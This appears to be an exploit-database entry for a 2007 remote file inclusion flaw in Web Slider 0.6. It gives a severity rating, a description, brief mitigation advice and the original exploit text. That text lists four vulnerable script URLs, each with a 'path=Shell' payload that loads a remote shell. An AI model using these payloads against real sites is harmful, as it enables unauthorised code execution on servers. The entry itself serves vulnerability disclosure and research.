header-logo
Suggest Exploit
vendor:
Web Slider
by:
GolD_M
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Web Slider
Affected Version From: 0.6
Affected Version To: 0.6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Web Slider 0.6 Remote File Inclusion Vulnerabilities

The vulnerability allows an attacker to include a remote file by manipulating the 'path' parameter in the affected URLs. This can lead to remote code execution or other malicious activities.

Mitigation:

Update to a patched version of Web Slider or apply appropriate security measures to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

# Web Slider 0.6(path)Remote File Inclusion Vulnerabilities
# D.Script: http://sourceforge.net/projects/webslider/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://Www.Tryag.Com/cc
# Exploit:[Path]/index.php?path=Shell
# Exploit:[Path]/modules/pdf.php?path=Shell
# Exploit:[Path]/plugins/highlight.php?path=Shell
# Exploit:[Path]/include/modules.php?path=Shell
# Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb

# milw0rm.com [2007-04-15]